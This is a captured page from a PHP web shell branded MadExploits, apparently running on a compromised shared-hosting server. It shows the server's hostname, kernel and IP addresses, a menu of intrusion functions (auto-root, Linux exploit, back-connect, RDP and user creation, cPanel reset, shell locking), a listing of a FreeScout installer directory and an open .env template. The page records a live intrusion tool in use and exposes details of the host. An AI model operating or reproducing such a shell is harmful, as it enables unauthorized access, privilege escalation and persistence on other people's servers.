Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.148.108.144
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
freescout /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.env
897
B
-rw-r--r--
.installed
59
B
-rw-r--r--
clone.php
9.39
KB
-rw-r--r--
config.php
34.61
KB
-rw-r--r--
edit.php
4.27
KB
-rw-r--r--
edit.xml
447
B
-rw-r--r--
extend.php
10.05
KB
-rw-r--r--
fileindex.php
336
B
-rw-r--r--
freescout.sql
27.02
KB
-rw-r--r--
freescout.zip
10.21
MB
-rw-r--r--
import.php
3.15
KB
-rw-r--r--
info.xml
2.59
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
6.55
KB
-rw-r--r--
install.xml
1.83
KB
-rw-r--r--
md5
3.7
KB
-rw-r--r--
notes.txt
503
B
-rw-r--r--
update_pass.php
518
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .env
# Every time you are making changes in .env file, in order changes to take an effect you need to run: # php artisan freescout:clear-cache # Application URL APP_URL=[[softurl]] # Improve security SESSION_SECURE_COOKIE= # Timezones: https://github.com/freescout-helpdesk/freescout/wiki/PHP-Timezones # Comment it to use default timezone from php.ini APP_TIMEZONE=America/New_York # Default language APP_LOCALE=[[language]] # Database settings DB_CONNECTION=mysql DB_HOST=[[softdbhost]] DB_PORT=3306 DB_DATABASE=[[softdb]] DB_USERNAME=[[softdbuser]] DB_PASSWORD="[[softdbpass]]" # Run the following console command to generate the key: php artisan key:generate # Otherwise application will show the following error: "Whoops, looks like something went wrong" APP_KEY=[[APP_KEY]] # Uncomment to see errors in your browser, don't forget to comment it back when debugging finished #APP_DEBUG=true
Close